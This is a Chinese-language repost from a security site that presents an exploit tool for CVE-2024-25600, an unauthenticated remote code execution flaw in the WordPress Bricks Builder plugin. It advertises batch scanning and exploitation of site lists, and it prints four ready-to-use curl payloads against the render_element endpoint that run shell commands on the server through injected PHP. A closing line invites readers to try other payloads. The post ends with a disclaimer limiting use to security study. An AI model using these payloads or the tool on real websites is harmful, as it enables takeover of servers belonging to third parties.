CVE-2024-25600 漏洞利用工具

华盟原创文章投稿奖励计划

介绍

该工具旨在利用 WordPress Bricks Builder 插件中发现的 CVE-2024-25600 漏洞。该漏洞允许在受影响的网站上未经身份验证的远程代码执行。该工具通过检索随机数并发送特制请求来执行任意命令,从而自动化利用过程。

特点

  • 互动模式:与目标网站实时互动🕹️。

  • 批处理模式:扫描并利用列表中的多个网站📋。

  • 命令执行:在目标服务器上执行任意命令⚙️。

  • 有效负载定制:选择不同的有效负载进行利用,包括generic、carousel、container和code🧰。

  • RCE确认:仅显示和记录已确认RCE的URL的选项✔️。

概念验证 (PoC

本公开提供的基础PoC如下:

第一个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \-H "Content-Type: application/json" \-d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "container", "settings": { "hasLoop": "true", "query": { "useQueryEditor": true, "queryEditor": "throw new Exception(`id`);", "objectType": "post" } } }}'

第二个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \ -H "Content-Type: application/json" \ -d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "carousel", "settings": { "type": "posts", "query": { "useQueryEditor": true, "queryEditor": "throw new Exception(`id`);", "objectType": "post" } } }}'

第三个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \ -H "Content-Type: application/json" \ -d '{ "postId": "1",  "nonce": "[NONCE]", "element": "1", "loopElement": { "settings": { "query": { "useQueryEditor": "", "queryEditor": "throw new Exception(`id`);" } } }}'

第四个概念验证(对旧版本有效):

curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \-H "Content-Type: application/json" \-d '{ "postId": "1", "nonce": "[NONCE]", "element": { "name": "code", "settings": { "executeCode": "true", "code": "<?php throw new Exception(`id`);?>" } }}'

注意:第四个 PoC 对于旧版本的 Bricks Builder(在版本 1.8 上测试)特别有效,以前的 PoC 可能不起作用。

额外的有效负载可能会产生更好的结果。如果我的漏洞利用或概念验证对您不起作用,我鼓励您尝试其他有效负载以找到更有效的解决方案。

项目地址

https://github.com/Chocapikk/CVE-2024-25600

文章来源:乌雲安全

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

自动草稿

本文来源乌雲安全,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复